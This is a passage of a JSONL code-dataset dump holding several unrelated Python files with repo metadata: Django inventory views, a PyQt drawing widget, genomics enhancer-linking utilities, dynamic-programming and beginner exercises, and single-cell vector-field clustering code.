open('lambda.pkl'))\n","repo_name":"megacell/MASS-attacks","sub_path":"param_inference/make_queries.py","file_name":"make_queries.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"72634276383","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**6)\n\nY, X = map(int, input().split())\narea = []\nfor _ in range(Y):\n area.append(list(map(int, input().split())))\ndy = [0, 1, 1]\ndx = [1, 0, 1]\n\ncache = [[-1] * X for _ in range(Y)]\n\ndef candy(y, x):\n if cache[y][x] != -1:\n return cache[y][x]\n if y == Y-1 and x == X-1:\n return area[y][x]\n ret = 0\n for d in range(3):\n ny = y + dy[d]\n nx = x + dx[d]\n if 0 <= ny < Y and 0 <= nx < X:\n ret = max(ret, candy(ny, nx) + area[y][x])\n cache[y][x] = ret\n return ret\n\nprint(candy(0, 0))\n\nY, X = map(int, input().split())\narea = []\nfor _ in range(Y):\n area.append(list(map(int, input().split())))\ncache = [[0] * (X+1) for _ in range(Y+1)]\nfor i in range(1, Y+1):\n for j in range(1, X+1):\n cache[i][j] = area[i-1][j-1] + max(cache[i-1][j], cache[i][j-1], cache[i-1][j-1])\nprint(cache[Y][X])","repo_name":"ifhakhyeon/hakhyeon-s_note","sub_path":"파이썬/백준/백준 11048.py","file_name":"백준 11048.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42863067080","text":" \nfrom django.shortcuts import render, redirect\nfrom .models import Stock\nfrom .forms import StockForm, StockSearchForm, StockUpdateForm, IssueForm, ReceiveForm, ReorderLevelForm,CategoryCreateForm\nfrom django.contrib import messages\nfrom simple_history.utils import update_change_reason\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\n\n@login_required(login_url='/accounts/login/')\ndef add_items(request):\n\tform = StockForm(request.POST or None)\n\tif form.is_valid():\n\t\tform.save()\n\t\tmessages.success(request, 'Successfully Saved')\n\t\treturn redirect('/')\n\n\tcontext = {\n\t\t\"form\":form,\n\t\t\"title\":\"Add Item\"\n\t} \n\treturn render(request, 'store/add_item.html', context)\n\n@login_required(login_url='/accounts/login/')\ndef add_category(request):\n\tform = CategoryCreateForm(request.POST or None)\n\tif form.is_valid():\n\t\tform.save()\n\t\tmessages.success(request, 'Successfully Created')\n\t\treturn redirect('/')\n\tcontext = {\n\t\t\"form\": form,\n\t\t\"title\":\"Add Category\"\n\t}\n\treturn render(request, \"store/add_item.html\", context)\n\n@login_required(login_url='/accounts/login/')\ndef list_item(request):\n title = 'List of Items'\n form = StockSearchForm(request.POST or None)\n\n queryset = Stock.objects.all()\n\n if request.method == 'POST':\n queryset = Stock.objects.filter(\n product_name__icontains=form['product_name'].value()\n )\n context = {\n \"form\": form,\n \"header\": title,\n \"queryset\": queryset,\n }\n return render(request, \"store/list_item.html\", context) \n\n@login_required(login_url='/accounts/login/')\ndef update_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n form = StockUpdateForm(instance=queryset)\n if request.method == 'POST':\n form = StockUpdateForm(request.POST, instance=queryset)\n if form.is_valid():\n form.save()\n messages.success(request, 'Successfully Saved')\n return redirect('/')\n\n context = {\n 'form':form,\n\t\t\"title\":\"Update Item\"\n }\n return render(request, 'store/add_item.html', context) \n\n@login_required(login_url='/accounts/login/')\ndef delete_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n if request.method == 'POST':\n queryset.delete()\n messages.success(request, 'Item deleted')\n return redirect('/')\n return render(request, 'store/delete_items.html') \n\ndef stock_detail(request, pk):\n\tqueryset = Stock.objects.get(id=pk)\n\tcontext = {\n\t\t\"queryset\": queryset,\n\t\t\"title\":\"Delete Item\"\n\t}\n\treturn render(request, \"store/stock_detail.html\", context) \n\n@login_required(login_url='/accounts/login/')\ndef issue_items(request, pk):\n\tqueryset = Stock.objects.get(id=pk)\n\tform = IssueForm(request.POST or None, instance=queryset)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.quantity -= instance.issued_quantity\n\t\tinstance.issue_by = str(request.user)\n\t\tmessages.success(request, \"Issued SUCCESSFULLY. \" + str(instance.quantity) + \" \" + str(instance.product_name) + \"s now left in Store\")\n\t\tinstance.save()\n\n\t\treturn redirect('/stock_detail/'+str(instance.id))\n\t\t\n\tcontext = {\n\t\t\"title\": 'Issue ' + str(queryset.product_name),\n\t\t\"queryset\": queryset,\n\t\t\"form\": form,\n\t\t\"username\": 'Issue By: ' + str(request.user),\n\t}\n\treturn render(request, \"store/add_item.html\", context)\n\n\n@login_required(login_url='/accounts/login/')\ndef receive_items(request, pk):\n\tqueryset = Stock.objects.get(id=pk)\n\tform = ReceiveForm(request.POST or None, instance=queryset)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.quantity += instance.received_quantity\n\t\tinstance.save()\n\t\tmessages.success(request, \"Received SUCCESSFULLY. \" + str(instance.quantity) + \" \" + str(instance.product_name)+\"s now in Store\")\n\n\t\treturn redirect('/stock_detail/'+str(instance.id))\n\t\t\n\tcontext = {\n\t\t\t\"title\": 'Receive ' + str(queryset.product_name),\n\t\t\t\"instance\": queryset,\n\t\t\t\"form\": form,\n\t\t\t\"username\": 'Receive By: ' + str(request.user),\n\t\t}\n\treturn render(request, \"store/add_item.html\", context)\n\n@login_required(login_url='/accounts/login/')\ndef reorder_level(request, pk):\n\tqueryset = Stock.objects.get(id=pk)\n\tform = ReorderLevelForm(request.POST or None, instance=queryset)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\tmessages.success(request, \"Reorder level for \" + str(instance.product_name) + \" is updated to \" + str(instance.alert_amount))\n\n\t\treturn redirect(\"/\")\n\tcontext = {\n\t\t\t\"instance\": queryset,\n\t\t\t\"form\": form,\n\t\t}\n\treturn render(request, \"store/add_item.html\", context) \n\n@login_required(login_url='/accounts/login/')\ndef list_history(request):\n\tqueryset = Stock.history.all()\n\n\tform = StockSearchForm(request.POST or None)\n\tif request.method == 'POST':\n\t\tqueryset = Stock.history.filter(\n\t\t\t\t\t\t\t\tproduct_name__icontains=form['product_name'].value()\n\t\t\t\t\t\t\t\t)\n\t\t\n\tcontext = {\n\t\t'historyset': queryset,\n\t\t'form': form\n\t}\n\treturn render(request, 'store/history.html', context)","repo_name":"Kadas36/Inventory","sub_path":"inventory/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6696372154","text":"from __future__ import absolute_import\nfrom __future__ import division\n\nimport globals.constants as c\nif c.PYQT5notPYQT4:\n from PyQt5.QtWidgets import QGraphicsItem\n from PyQt5.QtGui import QPen\n from PyQt5 import QtCore\nelse:\n from PyQt4.QtGui import QGraphicsItem, QPen\n from PyQt4 import QtCore\n\n\nclass WpZero(QGraphicsItem):\n \"\"\"\n class WpZero\n \"\"\"\n def __init__(self, center, color=QtCore.Qt.gray):\n self.sc = None\n super(WpZero, self).__init__()\n\n self.center = center\n self.allwaysshow = False\n self.color = color\n self.pen = QPen(QtCore.Qt.darkGray, 1, QtCore.Qt.SolidLine)\n self.pen.setCosmetic(True)\n\n self.diameter = 23.0\n\n def contains_point(self, point):\n \"\"\"\n WpZero cannot be selected. Return maximal distance\n \"\"\"\n return float(0x7fffffff)\n\n def setSelected(self, *args):\n \"\"\"\n Override inherited function - with possibility to be called with multiple arguments\n \"\"\"\n pass\n\n def paint(self, painter, option, widget=None):\n \"\"\"\n paint()\n \"\"\"\n painter.setPen(self.pen)\n demat = painter.deviceTransform()\n self.sc = demat.m11()\n\n diameter1 = self.diameter / self.sc\n diameter2 = (self.diameter - 4) / self.sc\n\n rectangle1 = QtCore.QRectF(-diameter1 / 2, -diameter1 / 2, diameter1, diameter1)\n rectangle2 = QtCore.QRectF(-diameter2 / 2, -diameter2 / 2, diameter2, diameter2)\n startAngle1 = 90 * 16\n spanAngle = 90 * 16\n startAngle2 = 270 * 16\n\n painter.drawEllipse(rectangle1)\n painter.drawEllipse(rectangle2)\n painter.drawPie(rectangle2, startAngle1, spanAngle)\n\n painter.setBrush(self.color)\n painter.drawPie(rectangle2, startAngle2, spanAngle)\n\n def boundingRect(self):\n \"\"\"\n Override inherited function to enlarge selection of Arrow to include all\n @param flag: The flag to enable or disable Selection\n \"\"\"\n if not self.sc: # since this function is called before paint; and scale is unknown\n return QtCore.QRectF(0, 0, 1e-9, 1e-9)\n\n diameter = self.diameter / self.sc\n return QtCore.QRectF(-diameter / 2, -diameter / 2, diameter, diameter)\n","repo_name":"cnc-club/dxf2gcode","sub_path":"source/gui/wpzero.py","file_name":"wpzero.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"} +{"seq_id":"26503283406","text":"import os\nimport json\nfrom argparse import Namespace\nimport subprocess\nimport pandas as pd\nimport pybedtools\n\n\n###############################\n# read meta file; create args #\n###############################\n\ndef create_args(meta_file, lib_name):\n with open(meta_file, \"r\") as f: \n meta_dict = json.load(f)\n \n args = Namespace(\n # from metadata file\n library_prefix = meta_dict[lib_name][\"prefix\"],\n library_reps = meta_dict[lib_name][\"replicates\"],\n library_pair= meta_dict[lib_name][\"read_pairs\"],\n library_umi = meta_dict[lib_name][\"umi\"],\n library_suffix = meta_dict[lib_name][\"suffix\"],\n library_short = meta_dict[lib_name][\"shortform\"],\n reference_genome = meta_dict[\"genome\"][\"ref_fasta\"],\n reference_genome_twobit = meta_dict[\"genome\"][\"ref_twobit\"],\n roi_file = meta_dict[\"roi\"][\"filtered\"]\n )\n\n return args\n\n\n###################\n# filepath parser #\n###################\n\ndef get_lib_dapeak_filepath(store_dir, lib_short, da_type):\n peak_filepath = os.path.join(\n store_dir, lib_short, f\"{da_type}.bed\"\n )\n return peak_filepath\n\ndef get_enhancer_gene_mapped_file(store_dir, peak_desc, lib_short, method, da_type):\n return os.path.join(store_dir, peak_desc, lib_short, method, f\"{da_type}.tsv\")\n\ndef get_rnaseq_de_file(store_dir, lib_short):\n return os.path.join(store_dir, f\"{lib_short}_vs_CC.tsv\")\n\n\n#####################\n# peak to genes lfc #\n#####################\n\ndef parse_rnaseq_de_file(rnaseq_de_file):\n df = pd.read_csv(rnaseq_de_file, sep=\"\\t\")\n df.columns = [c.strip('\"') for c in df.columns]\n return df.loc[:, [\"gene_symbol\", \"logFC\", \"FDR\"]]\n\ndef parse_great_output(great_outfile):\n \"\"\"\n Returns enhancer mapped to their genes\n \"\"\"\n df = pd.read_csv(great_outfile, skiprows=3, sep=\"\\t\")\n df = df.loc[df.iloc[:, 0]==\"Ensembl Genes\"]\n df.Regions = df.Regions.str.split(\",\")\n df = df.explode(\"Regions\", ignore_index=True)\n df = df.loc[:, [\"Regions\", \"Genes\"]]\n df[[\"chrom\", \"start\"]] = df.Regions.str.split(\"-\", expand=True)[0].str.split(\":\", expand=True)\n df[\"end\"] = df.Regions.str.split(\"-\", expand=True)[1]\n df = df.astype({\"start\": int, \"end\": int})\n return df.loc[:, [\"chrom\", \"start\", \"end\", \"Genes\"]]\n\n\ndef link_enhancers_to_genes(great_outfile, rnaseq_de_file):\n df_great = parse_great_output(great_outfile)\n df_rnaseq = parse_rnaseq_de_file(rnaseq_de_file)\n df = df_great.merge(df_rnaseq, left_on=\"Genes\", right_on=\"gene_symbol\").drop(columns=[\"gene_symbol\"])\n return df.sort_values([\"chrom\", \"start\", \"end\"]).groupby([\"chrom\", \"start\", \"end\"]).agg(lambda x: x.to_list())\n\n\n#####################\n# peak to peaks lfc #\n#####################\n\ndef parse_peak_file(peak_file):\n df = pd.read_csv(peak_file, sep=\"\\t\", header=None, usecols=[0,1,2], names=[\"chrom\", \"start\", \"end\"])\n return df\n\ndef parse_meta_rpp_file(rpp_file, lib_short, cc_short):\n df_rpp = pd.read_csv(rpp_file, index_col=[0,1,2])\n df_rpp.index = df_rpp.index.rename([\"chrom\", \"start\", \"end\"])\n required_columns = [c for c in df_rpp.columns if ((c.startswith(lib_short)) or (c.startswith(cc_short)))]\n df_rpp = df_rpp.loc[:, required_columns]\n return df_rpp.reset_index()\n \ndef link_enhancers_to_libwise_rpp(meta_rpp_file, peak_file, lib_short, cc_short):\n df_peak = parse_peak_file(peak_file)\n df_rpp = parse_meta_rpp_file(meta_rpp_file, lib_short, cc_short)\n df = df_peak.merge(df_rpp, on=[\"chrom\", \"start\", \"end\"])\n return df\n\n\n##################\n# binding motifs #\n##################\n\ndef parse_tf_binding_file(tf_binding_file, tf_name_file):\n tfn = open(tf_name_file, \"r\") \n tf_name_dict = json.load(tfn)\n tfn.close()\n df = pd.read_csv(tf_binding_file, sep=\"\\t\")\n df[[\"chrom\", \"start\"]] = df.PositionID.str.split(\"-\", expand=True)[0].str.split(\":\", expand=True)\n df[\"end\"] = df.PositionID.str.split(\"-\", expand=True)[1]\n df = df.astype({\"start\": int, \"end\": int})\n df[\"Motif Name\"] = df[\"Motif Name\"].apply(lambda x: tf_name_dict.get(x, \"\"))\n return df.loc[:, [\"chrom\", \"start\", \"end\", \"Motif Name\"]]\n\ndef link_enhancers_to_binding_motifs(tf_binding_file, tf_name_file, peak_file):\n df_peak = parse_peak_file(peak_file)\n df_bind = parse_tf_binding_file(tf_binding_file, tf_name_file)\n df = df_peak.merge(df_bind, on=[\"chrom\", \"start\", \"end\"])\n return df.groupby([\"chrom\", \"start\", \"end\"]).agg(lambda x: sorted(set([i for i in x.to_list() if i])))\n\n\n#####################\n# chip intersection #\n#####################\n\ndef modify_empty_dataframe(df):\n if df.empty:\n df = pd.DataFrame(columns=[\"chrom\", \"start\", \"end\"])\n return df\n\ndef parse_chip_file(chip_dir, chip_type, chip_name):\n chip_files = [f.path for d in os.scandir(os.path.join(chip_dir, chip_type, chip_name)) for f in os.scandir(d.path) if f.path.endswith(\".bed.gz\")]\n if len(chip_files)>1:\n chip_bed = pybedtools.BedTool(\"\", from_string=True).cat(*chip_files)\n elif len(chip_files)==1:\n chip_bed = pybedtools.BedTool(chip_files[0])\n else:\n raise ValueError(f\"Chipfile not found for {chip_name}\")\n return chip_bed\n\ndef link_enhancers_to_chip(chip_dir, chip_type, chip_name, peak_file):\n peak_bed = pybedtools.BedTool(peak_file)\n chip_bed = parse_chip_file(chip_dir, chip_type, chip_name)\n df = peak_bed.intersect(chip_bed, u=True).to_dataframe()\n df = modify_empty_dataframe(df)\n df[chip_type] = chip_name\n return df.loc[:, [\"chrom\", \"start\", \"end\", chip_type]]\n\ndef link_enhancers_to_multiple_chips(chip_dir, chip_type, chip_names, peak_file):\n chip_dfs = [link_enhancers_to_chip(chip_dir, chip_type, chip, peak_file) for chip in chip_names]\n df = pd.concat(chip_dfs, axis=0)\n return df.groupby([\"chrom\", \"start\", \"end\"]).agg(lambda x: x.to_list())\n","repo_name":"deeprob/starrseq_enhancer_characterization","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25045905970","text":"def isprime(num):\n n=num//2\n while n>1:\n if num%n==0:\n return False\n n-=1\n return True\n\n\ndef getfactors(num):\n fac=[]\n n=num//2\n while n:\n if num%n==0:\n fac.append(n)\n n-=1\n fac.append(num)\n return fac\n\n\n#素因子分解\n#注意:这里所有的因子之积应该等于num,未实现\ndef return_prime_factors(num):\n f=getfactors(num)\n for i in f:\n if not isprime(i):\n f.remove(i)\n return f\n\n\ndef isperfect(num):\n f=getfactors(num)\n return 2*num==sum(i for i in f)\n\n\n\ndef nmul(num):\n s=1\n for i in range(1,num+1):\n s=s*i\n return s\n\ndef fib(n):\n l=[0,1]\n i=2\n while i<=n:\n l.append(l[i-1]+l[i-2])\n i+=1\n return l[n]\n\n\n\ndef printnum(n1,n2):\n print(\"DEC\\tBIN\\tOCT\\t\\HEX\\tASCII\")\n print(\"---------------------------------------\")\n for i in range(n1,n2+1):\n if i<33:\n print(i,bin(i),oct(i),hex(i))\n else:\n print(i,bin(i),oct(i),hex(i),chr(i))\n\n\ndef myinput():\n list=[]\n n=input(\"Enter total name:\")\n n=int(n)\n i=1\n wr_count=0\n while n:\n str=input(\"Please input name %d\" % i)\n str=str.strip()\n if \",\" not in str:\n print(\"Wrong format...should be Last,First.\")\n str.replace(' ',',')\n wr_count+=1\n print(\"YOU have done %d time(s)\" % wr_count)\n list.append(str)\n i+=1\n n-=1\n print(\"the sorted list is:\")\n for s in sorted(list):\n print(s)\n","repo_name":"vimalk78/Code_training","sub_path":"Python/chapter 8.py","file_name":"chapter 8.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71639142625","text":"from typing import List, Optional, Union\n\nimport numpy as np\nimport pandas as pd\nfrom anndata import AnnData\nfrom scipy.sparse import csr_matrix\nfrom scipy.stats import mode\nfrom sklearn.neighbors import NearestNeighbors\n\nfrom ..dynamo_logger import main_info\nfrom ..preprocessing.pca import pca\nfrom ..tools.clustering import hdbscan, leiden, louvain\nfrom ..tools.connectivity import k_nearest_neighbors\nfrom ..tools.Markov import (\n grid_velocity_filter,\n prepare_velocity_grid_data,\n velocity_on_grid,\n)\nfrom ..utils import LoggerManager, copy_adata\nfrom .scVectorField import SvcVectorField\nfrom .utils import vecfld_from_adata\n\n\ndef cluster_field(\n adata: AnnData,\n basis: str = \"pca\",\n features: List = [\"speed\", \"potential\", \"divergence\", \"acceleration\", \"curvature\", \"curl\"],\n add_embedding_basis: bool = True,\n embedding_basis: Optional[str] = None,\n normalize: bool = False,\n method: str = \"leiden\",\n cores: int = 1,\n copy: bool = False,\n resolution: float = 1.0,\n **kwargs,\n) -> Optional[AnnData]:\n \"\"\"Cluster cells based on vector field features.\n\n We would like to see whether the vector field can be used to better define cell state/types. This can be accessed\n via characterizing critical points (attractor/saddle/repressor, etc.) and characteristic curves (nullcline,\n separatrix). However, the calculation of those is not easy, for example, a strict definition of an attractor is\n states where velocity is 0 and the eigenvalue of the jacobian matrix at that point is all negative. Under this\n strict definition, we may sometimes find the attractors are very far away from our sampled cell states which makes\n them less meaningful although this can be largely avoided when we decide to remove the density correction during the\n velocity projection. This is not unexpected as the vector field we learned is defined via a set of basis functions\n based on gaussian kernels and thus it is hard to satisfy that strict definition.\n\n Fortunately, we can handle this better with the help of a different set of ideas. Instead of using critical points\n by the classical dynamic system methods, we can use some machine learning approaches that are based on extracting\n geometric features of streamline to \"cluster vector field space\" for define cell states/type. This requires\n calculating, potential (ordered pseudotime), speed, curliness, divergence, acceleration, curvature, etc. Thanks to\n the fact that we can analytically calculate the Jacobian matrix, those quantities of the vector field function\n can be conveniently and efficiently calculated.\n\n Args:\n adata: adata object that includes both newly synthesized and total gene expression of cells. Alternatively,\n the object should include both unspliced and spliced gene expression of cells.\n basis: The space that will be used for calculating vector field features. Valid names includes, for example, `pca`,\n `umap`, etc.\n features: features have to be selected from ['speed', 'potential', 'divergence', 'acceleration', 'curvature', 'curl']\n add_embedding_basis: Whether to add the embedding basis to the feature space for clustering.\n embedding_basis: The embedding basis that will be combined with the vector field feature space for clustering.\n normalize: Whether to mean center and scale the feature across all cells.\n method: The method that will be used for clustering, one of `{'kmeans'', 'hdbscan', 'louvain', 'leiden'}`. If `louvain`\n or `leiden` used, you need to have `cdlib` installed.\n cores: The number of parallel jobs to run for neighbors search. ``None`` means 1 unless in a\n :obj:`joblib.parallel_backend` context.\n ``-1`` means using all processors.\n copy: Whether to return a new deep copy of `adata` instead of updating `adata` object passed in arguments.\n resolution: Clustering resolution, higher values yield more fine-grained clusters.\n kwargs: Any additional arguments that will be passed to either kmeans, hdbscan, louvain or leiden clustering algorithms.\n\n Returns:\n Either updates `adata` or directly returns a new `adata` object if `copy` is `True`.\n\n \"\"\"\n\n logger = LoggerManager.gen_logger(\"dynamo-cluster_field\")\n logger.log_time()\n adata = copy_adata(adata) if copy else adata\n\n features = list(\n set(features).intersection([\"speed\", \"potential\", \"divergence\", \"acceleration\", \"curvature\", \"curl\"])\n )\n if len(features) < 1:\n raise ValueError(\n \"features have to be selected from ['speed', 'potential', 'divergence', 'acceleration', \"\n f\"'curvature', 'curl']. your feature is {features}\"\n )\n\n feature_key = [\n \"speed_\" + basis,\n basis + \"_ddhodge_potential\",\n \"divergence_\" + basis,\n \"acceleration_\" + basis,\n \"curvature_\" + basis,\n \"curl_\" + basis,\n ]\n feature_list = [i + \"_\" + basis if i != \"potential\" else basis + \"_ddhodge_\" + i for i in features]\n\n if feature_key[0] not in adata.obs.keys() and feature_key[0] in feature_list:\n from ..vectorfield import speed\n\n speed(adata, basis=basis)\n if feature_key[1] not in adata.obs.keys() and feature_key[1] in feature_list:\n from ..ext import ddhodge\n\n ddhodge(adata, basis=basis)\n if feature_key[2] not in adata.obs.keys() and feature_key[2] in feature_list:\n from ..vectorfield import divergence\n\n divergence(adata, basis=basis)\n if feature_key[3] not in adata.obs.keys() and feature_key[3] in feature_list:\n from ..vectorfield import acceleration\n\n acceleration(adata, basis=basis)\n if feature_key[4] not in adata.obs.keys() and feature_key[4] in feature_list:\n from ..vectorfield import curvature\n\n curvature(adata, basis=basis)\n\n if feature_key[5] not in adata.obs.keys() and feature_key[5] in feature_list:\n from ..vectorfield import curl\n\n curl(adata, basis=basis)\n\n feature_data = adata.obs.loc[:, feature_list].values\n if embedding_basis is None:\n embedding_basis = basis\n if add_embedding_basis:\n X = np.hstack((feature_data, adata.obsm[\"X_\" + embedding_basis]))\n else:\n X = feature_data\n\n if normalize:\n # X = (X - X.min(0)) / X.ptp(0)\n X = (X - X.mean(0)) / X.std(0)\n\n if method in [\"hdbscan\", \"kmeans\"]:\n if method == \"hdbscan\":\n key = \"field_hdbscan\"\n hdbscan(adata, X_data=X, result_key=key, **kwargs)\n elif method == \"kmeans\":\n from sklearn.cluster import KMeans\n\n key = \"field_kmeans\"\n\n kmeans = KMeans(random_state=0, **kwargs).fit(X)\n adata.obs[key] = kmeans.labels_.astype(\"str\")\n\n # clusters need to be categorical variables\n adata.obs[key] = adata.obs.obs[key].astype(\"category\")\n\n elif method in [\"louvain\", \"leiden\"]:\n nbrs_idx, dist = k_nearest_neighbors(\n X,\n k=30,\n exclude_self=False,\n pynn_rand_state=19491001,\n n_jobs=cores,\n logger=logger,\n )\n\n row = np.repeat(nbrs_idx[:, 0], 30)\n col = nbrs_idx[:, 1:].flatten()\n graph = csr_matrix(\n (np.repeat(1, len(col)), (row, col)),\n shape=(adata.n_obs, adata.n_obs),\n )\n adata.obsp[\"vf_feature_knn\"] = graph\n\n if method == \"leiden\":\n leiden(adata, resolution=resolution, adj_matrix_key=\"vf_feature_knn\", result_key=\"field_leiden\", **kwargs)\n elif method == \"louvain\":\n louvain(adata, resolution=resolution, adj_matrix_key=\"vf_feature_knn\", result_key=\"field_louvain\", **kwargs)\n\n logger.finish_progress(progress_name=\"clustering_field\")\n\n if copy:\n return adata\n return None\n\n\ndef streamline_clusters(\n adata: AnnData,\n basis: str = \"umap\",\n features: list = [\"speed\", \"divergence\", \"acceleration\", \"curvature\", \"curl\"],\n method: str = \"sparsevfc\",\n xy_grid_nums: list = [50, 50],\n density: float = 5,\n curvature_method: int = 1,\n feature_bins: int = 10,\n clustering_method: str = \"leiden\",\n assign_fixedpoints: bool = False,\n reversed_fixedpoints: bool = False,\n **kwargs,\n) -> None:\n \"\"\"Cluster 2D streamlines based on vector field features. Initialize a grid over the state space and compute the\n flow of data through the grid using plt.streamplot with a given density. For each point individual streamline,\n computes the vector field 'features' of interest and stores the data via histograms. Add fixed points and\n \"reversed fixed points\" (sources of the streamlines) to the feature data dataframe based on the\n 'assigned_fixedpoints' and 'reversed_fixedpoints' args. Finally, then cluster the streamlines based on these\n features using the given 'clustering_method'.\n\n Args:\n adata: An AnnData object representing the network to be analyzed.\n basis: The basis to use for creating the vector field, either \"umap\" or \"tsne\". Defaults to \"umap\".\n features: A list of features to calculate for each point in the vector field. Defaults to [\"speed\", \"divergence\", \"acceleration\", \"curvature\", \"curl\"].\n method: The method to use for calculating the flow of data through the grid, either \"sparsevfc\" or \"gaussian\". Defaults to \"sparsevfc\".\n xy_grid_nums: The number of points to use in the x and y dimensions of the grid. Defaults to [50, 50].\n density: The density of the grid. Defaults to 5.\n curvature_method: The method to use for calculating curvature. Defaults to 1.\n feature_bins: The number of bins to use for discretizing the data. Defaults to 10.\n clustering_method: The method to use for clustering the data into modules, either \"louvain\" or \"leiden\". Defaults to \"leiden\".\n assign_fixedpoints: A boolean indicating whether to assign fixed points to the data. Defaults to False.\n reversed_fixedpoints: A boolean indicating whether to reverse the fixed points assignment. Defaults to False.\n\n Raises:\n ImportError: If the \"cdlib\" package is not installed and the \"louvain\" or \"leiden\" clustering method is specified.\n ValueError: If an invalid method is specified for calculating the flow of data through the grid.\n ValueError: If an invalid method is specified for clustering the data into modules.\n\n Returns:\n None, but updates the `adata` object with the following fields of the `adata.uns[\"streamline_clusters_\" + basis]`\n - \"feature_df\"\n - \"segments\"\n - \"X_pca\"\n - \"clustering_method\"\n - \"distances\"\n - \"connectivities\"\n - \"clusters\"\n - \"fixed_point\"\n - \"rev_fixed_point\"\n \"\"\"\n\n import matplotlib.pyplot as plt\n\n vf_dict, func = vecfld_from_adata(adata, basis=basis)\n grid_kwargs_dict = {\n \"density\": None,\n \"smooth\": None,\n \"n_neighbors\": None,\n \"min_mass\": None,\n \"autoscale\": False,\n \"adjust_for_stream\": True,\n \"V_threshold\": None,\n }\n\n if method.lower() == \"sparsevfc\":\n X, V = adata.obsm[\"X_\" + basis], adata.obsm[\"velocity_\" + basis]\n X_grid, p_mass, neighs, weight = prepare_velocity_grid_data(\n X,\n xy_grid_nums,\n density=grid_kwargs_dict[\"density\"],\n smooth=grid_kwargs_dict[\"smooth\"],\n n_neighbors=grid_kwargs_dict[\"n_neighbors\"],\n )\n for i in [\"density\", \"smooth\", \"n_neighbors\"]:\n grid_kwargs_dict.pop(i)\n\n V_emb = func(X)\n V_grid = (V_emb[neighs] * weight[:, :, None]).sum(1) / np.maximum(1, p_mass)[:, None]\n X_grid, V_grid = grid_velocity_filter(\n V_emb=V,\n neighs=neighs,\n p_mass=p_mass,\n X_grid=X_grid,\n V_grid=V_grid,\n **grid_kwargs_dict,\n )\n elif method.lower() == \"gaussian\":\n X_grid, V_grid, D = velocity_on_grid(\n vf_dict[\"X\"],\n vf_dict[\"Y\"],\n xy_grid_nums,\n cut_off_velocity=True,\n **grid_kwargs_dict,\n )\n else:\n raise ValueError(f\"only `sparsevfc` and `gaussian` method supported\")\n\n strm = plt.streamplot(\n X_grid[0],\n X_grid[1],\n V_grid[0],\n V_grid[1],\n density=density,\n )\n strm_res = strm.lines.get_segments() # get streamline segements\n\n # split segments into different streamlines\n line_list_ori = {}\n line_ind = 0\n for i, seg in enumerate(strm_res):\n if i == 0:\n line_list_ori[0] = [seg]\n else:\n # the second point from the previous segment should be the same from the first point in the current segment\n if all(strm_res[i - 1][1] == seg[0]):\n line_list_ori[line_ind].append(seg)\n else:\n line_ind += 1\n line_list_ori[line_ind] = [seg]\n\n line_list = line_list_ori.copy()\n\n # convert to list of numpy arrays.\n for key, values in line_list_ori.items():\n line_list_ori[key] = np.array(values).reshape((-1, 2))\n\n # remove duplicated rows from the numpy arrays.\n for key, values in line_list.items():\n line_list[key] = np.unique(np.array(values).reshape((-1, 2)), axis=0)\n\n vector_field_class = SvcVectorField()\n vector_field_class.from_adata(adata, basis=basis)\n\n has_acc = True if \"acceleration\" in features else False\n has_curv = True if \"curvature\" in features else False\n has_div = True if \"divergence\" in features else False\n has_speed = True if \"speed\" in features else False\n has_curl = True if \"curl\" in features else False\n\n if has_acc:\n acc_dict = {}\n if has_curv:\n cur_1_dict = {}\n cur_2_dict = {}\n if has_div:\n div_dict = {}\n if has_speed:\n speed_dict = {}\n if has_curl:\n curl_dict = {}\n\n # save features along the streameline and create histogram for each feature\n bins = feature_bins # number of feature bins\n line_len = []\n feature_df = np.zeros((len(line_list), len(features) * bins))\n\n for key, values in line_list.items():\n line_len.append(values.shape[0])\n tmp = None\n if has_acc:\n acceleration_val, _ = vector_field_class.compute_acceleration(values)\n acc_dict[key] = acceleration_val\n\n _, acc_hist = np.histogram(acceleration_val, bins=(bins - 1), density=True)\n if tmp is None:\n tmp = acc_hist\n if has_curv:\n curvature_val_1 = vector_field_class.compute_curvature(values, formula=1)[0]\n cur_1_dict[key] = curvature_val_1\n\n curvature_val_2, curvature_vec = vector_field_class.compute_curvature(values)\n cur_2_dict[key] = curvature_val_2\n\n _, cur_1_hist = np.histogram(curvature_val_1, bins=(bins - 1), density=True)\n _, cur_2_hist = np.histogram(curvature_val_2, bins=(bins - 1), density=True)\n if tmp is None:\n tmp = cur_1_hist if curvature_method == 1 else cur_2_hist\n else:\n tmp = np.hstack((tmp, cur_1_hist if curvature_method == 1 else cur_2_hist))\n if has_div:\n divergence_val = vector_field_class.compute_divergence(values)\n div_dict[key] = divergence_val\n\n _, div_hist = np.histogram(divergence_val, bins=(bins - 1), density=True)\n if tmp is None:\n tmp = div_hist\n else:\n tmp = np.hstack((tmp, div_hist))\n if has_speed:\n speed_vec = vector_field_class.func(values)\n speed_val = np.linalg.norm(speed_vec)\n speed_dict[key] = speed_val\n\n _, speed_hist = np.histogram(speed_val, bins=(bins - 1), density=True)\n if tmp is None:\n tmp = speed_hist\n else:\n tmp = np.hstack((tmp, speed_hist))\n if has_curl:\n curl_val = vector_field_class.compute_curl(values)\n curl_dict[key] = curl_val\n\n _, curl_hist = np.histogram(curl_val, 